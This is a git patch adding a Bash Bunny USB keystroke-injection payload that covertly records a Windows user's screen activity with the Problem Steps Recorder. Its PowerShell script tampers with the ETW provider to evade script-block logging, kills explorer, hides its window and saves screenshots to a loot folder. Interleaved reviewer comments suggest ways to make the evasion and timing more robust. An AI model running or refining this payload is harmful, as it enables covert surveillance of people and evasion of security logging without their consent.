From 5e95ba3d4060b1eb579d590d32b95c695f097f04 Mon Sep 17 00:00:00 2001
From: TW-D <75358550+TW-D@users.noreply.github.com>
Date: Fri, 28 Jan 2022 12:53:24 -0500
Subject: [PATCH] Add Win_ProblemStepsRecorder (#488)

Abuse of "Windows Problem Steps Recorder" to spy on a user's activities.
---
 .../win_problemstepsrecorder/README.md | 29 ++++++
 .../win_problemstepsrecorder/payload.ps1 | 50 ++++++++++
 .../win_problemstepsrecorder/payload.txt | 91 +++++++++++++++++++
 3 files changed, 170 insertions(+)
 create mode 100644 payloads/library/credentials/win_problemstepsrecorder/README.md
 create mode 100644 payloads/library/credentials/win_problemstepsrecorder/payload.ps1
 create mode 100644 payloads/library/credentials/win_problemstepsrecorder/payload.txt

diff --git a/payloads/library/credentials/win_problemstepsrecorder/README.md b/payloads/library/credentials/win_problemstepsrecorder/README.md
new file mode 100644
index 00000000..be634b96
--- /dev/null
+++ b/payloads/library/credentials/win_problemstepsrecorder/README.md
@@ -0,0 +1,29 @@
+# "Microsoft Windows" Problem Steps Recorder
+
+- Title: Win_ProblemStepsRecorder
+- Author: TW-D
+- Version: 1.0
+- Target: Microsoft Windows
+- Category: Credentials
+
+## Description
+
+1) Partially avoids "PowerShell Script Block Logging".
+2) Closing of all windows.
+3) Hide "PowerShell" window.
+4) Abuse of "Windows Problem Steps Recorder" to spy on a user's activities.
+5) Writes the file system cache to disk.
+6) Safely eject.
+
+## Configuration
+
+From "payload.txt" change the values of the following constants :
+```bash
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+readonly RECORDER_TIME=300
+
+
+```
diff --git a/payloads/library/credentials/win_problemstepsrecorder/payload.ps1 b/payloads/library/credentials/win_problemstepsrecorder/payload.ps1
new file mode 100644
index 00000000..acd1c159
--- /dev/null
+++ b/payloads/library/credentials/win_problemstepsrecorder/payload.ps1
@@ -0,0 +1,50 @@
+#
+# Author: TW-D
+# Version: 1.0
+#
+
+Param (
+    [String] $BB_VOLUME,
+    [Int] $RECORDER_TIME
+)
+
+# Partially avoids "PowerShell Script Block Logging".
+#
+$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static")
+$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid())
+$etw_provider.SetValue($null, $event_provider)
+
+# Closing of all windows.
+#
+Get-Process -Name "explorer" | Stop-Process
+
+# Hide "PowerShell" window.
+#
+$Script:showWindowAsync = Add-Type -MemberDefinition @"
+[DllImport("user32.dll")]
+public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
+"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
+$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
+
+If ((Test-Path -Path "C:\Windows\System32\psr.exe")) {
+
+    $bb_loot = "${BB_VOLUME}loot\"
+    $computer_name = $env:COMPUTERNAME
+
+    # Abuse of "Windows Problem Steps Recorder" to spy on a user's activities.
+    #
+    (C:\Windows\System32\psr.exe /start /sc 1 /maxsc 999 /gui 0 /sketch 1 /slides 1 /output "${bb_loot}${computer_name}_record.zip") | Out-Null
+    Start-Sleep -Seconds $RECORDER_TIME
+    (C:\Windows\System32\psr.exe /stop) | Out-Null
+
+}
+
+"Win_ProblemStepsRecorder terminated." | Out-File -FilePath .\..\..\loot\done.txt -Force
+
+# Writes the file system cache to disk.
+#
+Write-VolumeCache -DriveLetter ("${BB_VOLUME}".Substring(0,1))
+
+# Safely eject.
+#
+(New-Object -ComObject Shell.Application).Namespace(17).ParseName("${BB_VOLUME}").InvokeVerb("Eject")
\ No newline at end of file
diff --git a/payloads/library/credentials/win_problemstepsrecorder/payload.txt b/payloads/library/credentials/win_problemstepsrecorder/payload.txt
new file mode 100644
index 00000000..fc623c30
--- /dev/null
+++ b/payloads/library/credentials/win_problemstepsrecorder/payload.txt
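Review bot: The comment `# Partially avoids "PowerShell Script Block Logging".` over the PSEtwLogProvider swap promises more than the three lines under it deliver, because the swap runs from inside payload.ps1 itself and, as I understand Script Block Logging, the file's text is already emitted as a 4104 event when the script is invoked; only script blocks compiled afterwards are affected, and process-creation auditing (4688/Sysmon) of the `psr.exe` calls further down is untouched. I would state that in the comment: `# Replaces the PSEtwLogProvider instance so script blocks compiled after this line are not logged; this file's own text is already logged on invocation, and process-creation auditing of psr.exe is unaffected.` Independently, `Write-VolumeCache` belongs to the Storage module that I believe first shipped with Windows 8 / Server 2012, so on the Windows 7 / 2008 R2 hosts the payload header claims to support that line errors out instead of flushing; `if (Get-Command Write-VolumeCache -ErrorAction SilentlyContinue) { Write-VolumeCache -DriveLetter ("${BB_VOLUME}".Substring(0,1)) }` makes the gap explicit rather than silent. The two hard-coded `C:\Windows\System32\psr.exe` paths would be more robust as `"$env:SystemRoot\System32\psr.exe"`.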
@@ -0,0 +1,91 @@
+#!/bin/bash
+#
+# Title: Win_ProblemStepsRecorder
+#
+# Description:
+# Abuse of "Windows Problem Steps Recorder"
+# to spy on a user's activities.
+#
+# Author: TW-D
+# Version: 1.0
+# Category: Credentials
+# Target: Since Microsoft Windows 7 and 2008 R2
+# Attackmodes: HID and STORAGE
+#
+# TESTED ON
+# ===============
+# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
+# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
+#
+# NOTE
+# ===============
+# Use the browser "Internet Explorer" to read the ".mht" file correctly.
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# Cyan inverted single blink ...................... SPECIAL
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+readonly RECORDER_TIME=300
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+udisk mount
+
+######## ATTACK ########
+
+LED ATTACK
+
+Q DELAY 7000
+RUN WIN "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
+Q DELAY 7000
+
+LED STAGE2
+
+Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)\""
+Q ENTER
+Q DELAY 3500
+
+Q STRING "\$BB_SWITCH = \"\${BB_VOLUME}payloads\\${SWITCH_POSITION}\\\""
+Q ENTER
+Q DELAY 1500
+
+Q STRING "CD \"\${BB_SWITCH}\""
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+Q STRING ".\payload.ps1 -BB_VOLUME \"\${BB_VOLUME}\" -RECORDER_TIME ${RECORDER_TIME}"
+Q ENTER
+Q DELAY 1500
+
+LED SPECIAL
+
+until [ -f /root/udisk/loot/done.txt ]; do sleep 10; sync; done
+
+######## CLEANUP ########
+
+LED CLEANUP
+
+rm /root/udisk/loot/done.txt
+sync
+udisk unmount
+
+######## FINISH ########
+
+LED FINISH
+
+shutdown -h 0
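Review bot: The `until [ -f /root/udisk/loot/done.txt ]; do sleep 10; sync; done` wait has no upper bound, so if any typed stage fails before payload.ps1 reaches its `Out-File` of done.txt (no volume whose label matches `BB_LABEL`, a focus change during a `Q DELAY`, the `CD` erroring because `$BB_VOLUME` resolved to nothing), the Bunny sits in SPECIAL forever with storage still mounted and never reaches CLEANUP. Bound it by the recording time plus a margin: `deadline=$(( $(date +%s) + RECORDER_TIME + 120 ))` followed by `until [ -f /root/udisk/loot/done.txt ] || [ "$(date +%s)" -ge "$deadline" ]; do sleep 10; sync; done`. Worth documenting in the header as well: everything typed through `Q STRING` into this interactive console is, as far as I know, recorded by PSReadLine in ConsoleHost_history.txt (`-NoProfile` does not stop that on PowerShell 5.1) and as 4104 script-block events before the ETW swap inside payload.ps1 takes effect, so the "Partially avoids Script Block Logging" claim in the README does not cover these lines. Finally, payload.ps1 calls `Write-VolumeCache`, which belongs to the Storage module that I believe first shipped with Windows 8 / Server 2012, so the `# Target: Since Microsoft Windows 7 and 2008 R2` line is optimistic for the flush step.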